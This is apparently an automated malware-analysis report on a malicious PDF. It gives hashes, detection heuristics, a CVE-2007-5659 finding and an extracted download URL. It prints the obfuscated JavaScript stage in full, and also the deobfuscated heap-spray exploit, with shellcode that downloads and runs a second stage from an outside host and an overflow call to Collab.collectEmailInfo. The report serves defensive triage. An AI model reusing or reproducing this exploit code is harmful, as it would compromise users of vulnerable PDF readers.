PDF malware analysis — malicious · 1f1fc7f5de6745f7

MALICIOUS

PDF

4.6 KB Created: 2008-08-06 01:42:27 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2026-05-08

MD5: 4d12229faa87828cd2c24f0b1ce9d9a0 SHA-1: 5db6fa650d9abbd6d1779a22c89be0f6c36539cc SHA-256: 1f1fc7f5de6745f7aaafbc43f7c5fdbe101f37890f61c06eec03b5220939fd1b

308 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. A high-severity PDF_EVAL heuristic firing suggests the use of eval(), which is often employed to deobfuscate and execute malicious code. The extracted JavaScript object, javascript_obj0013_001.js, is also noted as suspicious due to script obfuscation indicators. The primary intent appears to be the execution of arbitrary code via the eval() function within the JavaScript stream.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 8

Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659

PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
JavaScript action low 3 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.

Matched line in script

function MFMn0d4cUGQ(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function IP1jql(L5NHW5P89Myzmv){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(L5NHW5P89Myzmv)"+";"+"}");eval("function EHioBEpFUiS(YXeavM4VuK9){var jqqQxEmJGaLVOp="+"0,GUl69P3kglYszN=YXeavM4VuK9.l"+"en"+"gth,f6aam9EM5=10"+"2"+"4,nZWlhzfCk,dAn5rYcj,zr46RdsarFeTfD='',ivy79jrSu=jqqQxEmJGaLVOp,plD0Um0LpF=jqqQxEmJGaLVOp,q8NLM2o3F=jqqQxEmJGaLVOp, …

PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL

Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY

Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://abb192.cn/spl3/load.php?id=18&spl=4 Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0013_001.js`	pdf-javascript-stream	PDF /JS object 13 at offset 0x369	6335 bytes
SHA-256: `069b27fa67a4f6136b11b48923ada4984890d37dde96f1166cbd91f902f837cb`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 4 eval/decoder/string-building token(s). 126 of 242 identifiers look randomly generated (e.g. 'KD8Oq8C4KD8nLDC4KVQ9wlC4KV89LVC4UDnBwD'); 2 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script First 1,000 lines of the extracted script function MFMn0d4cUGQ(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function IP1jql(L5NHW5P89Myzmv){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(L5NHW5P89Myzmv)"+";"+"}");eval("function EHioBEpFUiS(YXeavM4VuK9){var jqqQxEmJGaLVOp="+"0,GUl69P3kglYszN=YXeavM4VuK9.l"+"en"+"gth,f6aam9EM5=10"+"2"+"4,nZWlhzfCk,dAn5rYcj,zr46RdsarFeTfD='',ivy79jrSu=jqqQxEmJGaLVOp,plD0Um0LpF=jqqQxEmJGaLVOp,q8NLM2o3F=jqqQxEmJGaLVOp,FBnZJXRlR=Ar"+"ra"+"y(63,53,56,25,3,46,61,58,51,14,0,0,0,0,0,0,21,49,15,16,44,26,36,28,34,20,40,8,59,32,18,30,39,52,47,55,5,24,45,10,33,1,57,0,0,0,0,11,0,7,22,0,43,54,13,27,4,35,17,37,48,38,2,50,23,12,9,62,42,29,19,60,31,6,41);f"+"o"+"r(dAn5rYcj=M"+"at"+"h.c"+"ei"+"l(GUl69P3kglYszN/"+"f6aam9EM5)"+";dAn5rYcj>jqqQxEmJGaLVOp;dAn5rYcj-"+"-){fo"+"r(nZWlhzfCk=Ma"+"th.m"+"in(GUl69P3kglYszN,f6aam9EM5);nZWlhzfCk>jqqQxEmJGaLVOp;nZWlhzfCk-"+"-,GUl69P3kglYszN-"+"-){q8NLM2o3F\|"+"=(FBnZJXRlR[YXeavM4VuK9.cha"+"rCod"+"eAt(ivy79jrSu+"+"+)-48])<"+"<plD0Um0LpF;if(plD0Um0LpF){zr46RdsarFeTfD+"+"=IP1jql"+"(245^q8NLM2o3F&"+"2"+"5"+"5);q8NLM2o3F>"+">="+"8;plD0Um0LpF-"+"="+"2;}el"+"se{plD0Um0LpF="+"6"+";}}"+"}return (zr46RdsarFeTfD);}var CCKRh8b=implode('',['@BKkabfPuy3d','m','s','KzA','bfo@R','rF','nbfVaOK','k','qefS9p','6Fc5zkYozm','gb6JNNrAgNJAPOq5f_','LPcefRfEwXlEtlDm','u1a9DkxW','WX7ntJ','B','97RGpVi@_','UP','GmrF','@S','fRfEwXl','EtlD5u','mC','5zF','YeZSaPwX4gZ','PHNJ5MW7','iis_S9ogiy','xKD','mWqd@Lfo@','8','giyxKDmW','qd9iU1weJAandzn','8E1KpfRfEwX','l','Et','lD5VXcOzXYO','K','PgW3','STP6X4gZPHNJ5MW7iisdea8V8','@xKFYn2Xg','bfRfEw','XlEtlD7','G1Kb6F','c','5zkYo','z','mgb6m3OKMyeG','Fgo7','Au8','u19b6M','IO','U','1VEK','AY','8Kd','A','orF','Tbfo','@pGiTg3Ab','bD','kTgz','8@BKk','ab6RvO2','FeOU1','K','pfMgnzX','bN3XCe','61C4Uly','aD','AC4Ulya','DA','C','4U','l','ya','DAC4UA8n','L','VC','4JAy4','wVC42l4','g','_8C4U8Tx_8C4U8Tpq','AC','4','K','D','8EDA','C4KD','aaDAC4K','DS','9_V','C4','KD','f','p','qlC42D8nd','VC4','2D89','L','DC4U8S','W','wDC4U','D8yq','D','C4K','D8nL','DC42lY4LDC','4KDyvLDC4K8','89GlC4Ula','B','dAC4K889GlC4','2','llndlC4K','D8bD','A','C4KD8nLVC42','lY4LDC42Vqp','DA','C42lhSDlC','4KDhv_','AC4UAnpDAC4KD','8NqAC4KD8n','LDC4KVQ9w','l','C42','Vq4','LVC','4','J','l','nSDlC42','lcv','qAC4UAn4_A','C','4','KD8NwDC','4KD8nLDC','4','KVQ9w','lC42Vq','4dlC4JVQeDlC4KAT','4wDC4UAnx','GDC4KD8','bGDC4KD8','n','LDC4K','VQ9wlC42Vq4dAC4UAT','SD','l','C4UA','8OqAC','4','UAn','SwDC4K','D8','EwVC','4KD8','nLD','C4KVQ','9wlC42V','qBLD','C42A','leDlC','4U','AQowlC4UAn4','DlC','4KD8Oq8C4KD8nLDC4KVQ9wlC4KV89LVC4UDnBwD','C4K8QO','DVC42l4','vqlC42Dn','v_VC4KDfpwlC4KD8n_','DC42','Vh','4L','DC','4K8Q9','w','lC42lYgLVC4KDS','N_V','C','4K','DleqlC42lYx','L','lC42','Dnx_V','C4U','Anx_8C','4','KD','89GlC4KD','8nLDC4U8n','x','LDC42Dca_8','C4','K8','8E','g','AC4JlfpDl','C4KD8','nLDC4','2l44L','DC42','Dyv_VC4','2AQ','9GlC42A','89DVC42l4x','L','D','C4JV8N_VC4KA','TSDlC','4KD8n','LDC42V8nLDC4','KVQ9Gl','C4U8c','BL','VC42V44g','DC42VQ9GlC','4UAnBdlC','4K','D8eq','DC4','KD8nLDC4','KVQ','ndVC42AfgLDC42V','y4L','D','C4JVh8qAC42A','f','SqVC4KD','SNLDC4U8QoDlC4K','D8nLDC4K8QNGAC42lYgLD','C4KDyv_VC4K','Dle','qlC42','lY','xLlC','42Dn','x_VC4KV8bD','l','C4KD8nL','DC4U8c4LDC42Vn4','g8','C4KVQnd','VC4','U','D','eELVC42VeE','GlC4','KATxdV','C4J','V8oqVC42','VeOLD','C4','KVQ9','GlC4U8','cBdAC','42V44_VC4','2V','Q','9GlC','4UAnBd','l','C4KD8EdVC4KD8nL','DC4K','D8eqlC4K8QNGAC42','lY','gLDC4K','Dnv_VC4KD','AeqlC42lYxL','lC42D','n','x_V','C42D8bDlC4KD8nLDC4U','8c4LDC42l','Y','vGAC42','D8N','_V','C','4KDleqlC42l','YxLlC42Dnx','_VC4KD8bDlC4KD8','nLDC4','KVlnL','DC42V','A','O','glC4UAlndVC4UAlnd','VC','4UA','lndVC4UAlndVC4UAyB','DVC','42Vc4LV','C42lY','xdVC4U','A','AE','qlC42VANG8C4UA8N','GAC42lYx_VC','4','2','lYp','DAC4KDn8wAC4','2VaBGlC42Vq4dAC','4K8e9G','lC','42','lYadA','C42','Dh8','wVC4KDeoDlC42VqvDVC4K8qBG','lC4K','D','eELDC','4UDeNDVC4KV4xw','lC4Ul','av_DC4','2AendV','C4UDe','O_','8C','4','KDTvq8','C42D8nqAC4KAAy_l','C','4KDn8wVC4','2AhxqDC4KDenLAC4KV8NG','DC4K','AlbGlC','4KAhaglC4','K','8QO_A','C4','2','V','cpqVC4','UAY','B','GlC42Vc','BG','lC4KDeELVC4U8qgwAC4KDyBGlC42lY','vglC42D','yx_lC4JAa4','d','VC4KD','S','9G','lC','4KDe9','GlC4','2V','hx','qVC4','2AAO','LAC4KD','8ndlC4','K','ASbDlC4KATvqAC42','V','QN','GA','C','4KVyxgD','C','4KVTvL','AC4KD8N_A','C4','JlYBG8C4JlT_G','lC42A8Eq','V','C42lhxwDC42laB','w','AC4JA','qgqAC42AlEw','AC4','2ll9DAC4','JlyxwDC42leWGAC','42A8EDAC','42l89DVC4','2lY','Bq','AC4JlTxqDC4Jl','TBG8C42lqgwD','C4J','AA9GlC4JAf','gqAC4Jl','yxwlC4','2leWGAC4JAYgGDp','8','V8@B','Kka','bfzOt3AO','EK8@iG1TSUl','TpGAT','pD','8@BKkabfR','aoKM0bf','o@0','LF','a9zVa5','u','mC5zFYe31','x','p6A','9','p6MIOU1a9','D','kxWW','X7ntJB97R@iG1','F7zm','TLzXqp','fe@Sf','R','aoKM07uAfEG8G','LG1','4NZX@8giyxKDmWq','d@iG1c5r','FyErkT','n','3S','p4fMqpq8T4fM','qpq8TxfS','9p','fRfEwX','l','EtlD','bfo@BtFINwmhEwzaig8osrMu8giyxKDmWqd3p6','X4gZPHNJ','5','MW','7','iis_S','9p6MIOU17Og','XUEqA','0sZPpbfo@','S','udy','NG','lq','o','EDGn3','X@iu1TSU','lTpGATpqS','Evt','PEbDPyoD','8@Bzmab','uS4NZX','@','PgP','Go_dbOdFo','oKoTLG5uo','rRDE','ZVNW_','irdLVTHzAh','0LPxOz8','ZerPwo','tkSWzDq7V','SG','pVi@83Pjet','zBNE','D5mgP','G','o_dbOdFooKt','@i','G1','w','eJAan','dzn8E','1Op6Rv','O2F','eOJ8@iU1Kb','6Fc5zkYozmgbfV','Ue','Jk3E_M','i','e','fS@LU14N','ZX@8JDYy_k@iG1IbUXgBKPC','WKFa9WF','aEKPE5Ze','Y','tzzY','O','KPgW3SGL','G1qW','gM','AN31','KpfioyUD','I5','6XCbUmIErF','ud','utAtV','F3x61GLG1','4','NZX@8WdYt_P','@iG1gnzM','@vLXaNriu','8','JDYy_kg','g3PI','OK','VYeuAGP','fi','oy','UDI5VkuNZXQyUSh8ueqWgMAN','ZeberkaNg','MuxqSGLG1','G','931u','SfdDyJ','5G7','EAJbfoKpu8@B6Q@SuSDoEM','7oz','dhiE1KiG','1hp6','QvpfdDyJ5G77AJbu','o@xqS@PUH@8W','dYt_','P5Nqt@','PG1','h8f','S@PUH@SfdDyJ5','G7EA','Jbf','oKp','Vl@B6Q@8Wd','Y','t_P','5','Nq','t@PG1h8u1','rmU','1u','8','WdYt_P5b','qt@PG1n','8fS','@','LU1gmZ','XcEU8j5','rda','SfS9p6MIOU1','u','e','tDbo','7d2e_Vjbfo@','42mCEJ','kIbKFux','fQcbDkTgrQcb','DkTgZ1GLG1ne','rP3n3SuetDb','o7d2e_Vj5umC5zFYe31rpulY8qla8u1','uetD','bo7d2e_VjbVS','KpuPVWdk','DsW56NgF9p','uMuoz','Xggzm3mrkpEEME','OKF@iG','1et3m3','NZkggz','m3m','rF','byKDUNrP3oLmv','t3','S9EKMps','Z','8@x6','13izXNs','G','1','ue','tDbo7d2','e_VjH','KS9p','f','H@iU1QH3ibmzVc9ESGLq']);");eval(EHioBEpFUiS(CCKRh8b));}
`generic_stage_recovery_000.js`	deobfuscated-js	generic stage recovery sixbit-xor-table from JavaScript object 13 at offset 0x369	2498 bytes
SHA-256: `81fd7535896039ae9b5576d1fdc7267b134cba3e4c83f3ae787ce71fe3d37211`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script var ihdXSzQD = new Array(); function Vga1nq3R2M8Gju(Ix3rES7Y, r6cjWqOUWzVJ) { while (Ix3rES7Y.length2<r6cjWqOUWzVJ){Ix3rES7Y += Ix3rES7Y;} Ix3rES7Y = Ix3rES7Y.substring(0,r6cjWqOUWzVJ/2); return Ix3rES7Y; } function nlrus8dnY2() { var Xs14yYDiep = 0x0c0c0c0c; var JfrfCr = unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u612F%u6262%u3931%u2E32%u6E63%u732F%u6C70%u2F33%u6F6C%u6461%u702E%u7068%u693F%u3D64%u3831%u7326%u6C70%u343D"); var Qko0ks9 = 0x400000; var IryuJ = JfrfCr.length 2; var r6cjWqOUWzVJ = Qko0ks9 - (IryuJ+0x38); var Ix3rES7Y = unescape("%u9090%u9090"); Ix3rES7Y = Vga1nq3R2M8Gju(Ix3rES7Y, r6cjWqOUWzVJ); var OBpm31Jjjb = (Xs14yYDiep - 0x400000)/Qko0ks9; for (var LhiIYcBgGy=0;LhiIYcBgGy<OBpm31Jjjb;LhiIYcBgGy++) { ihdXSzQD[LhiIYcBgGy] = Ix3rES7Y + JfrfCr; } } function AmxclCuV() { var yGtDa = app.viewerVersion.toString(); yGtDa = yGtDa.replace(/\D/g,""); var YYtOi = new Array(yGtDa.charAt(0),yGtDa.charAt(1),yGtDa.charAt(2)); if ((YYtOi[0] == 8 && ((YYtOi[1] == 1 && YYtOi[2] < 2) \|\| YYtOi[1] < 1)) \|\| (YYtOi[0] == 7 && YYtOi[1] < 1) \|\| (YYtOi[0] < 7)) { nlrus8dnY2(); var hXGcYZMHAd = unescape("%u0c0c%u0c0c"); while(hXGcYZMHAd.length < 44952) hXGcYZMHAd += hXGcYZMHAd; this.collabStore = Collab.collectEmailInfo({subj: "",msg: hXGcYZMHAd}); } } AmxclCuV();

Open this report in the interactive analyzer, or submit your own file for analysis.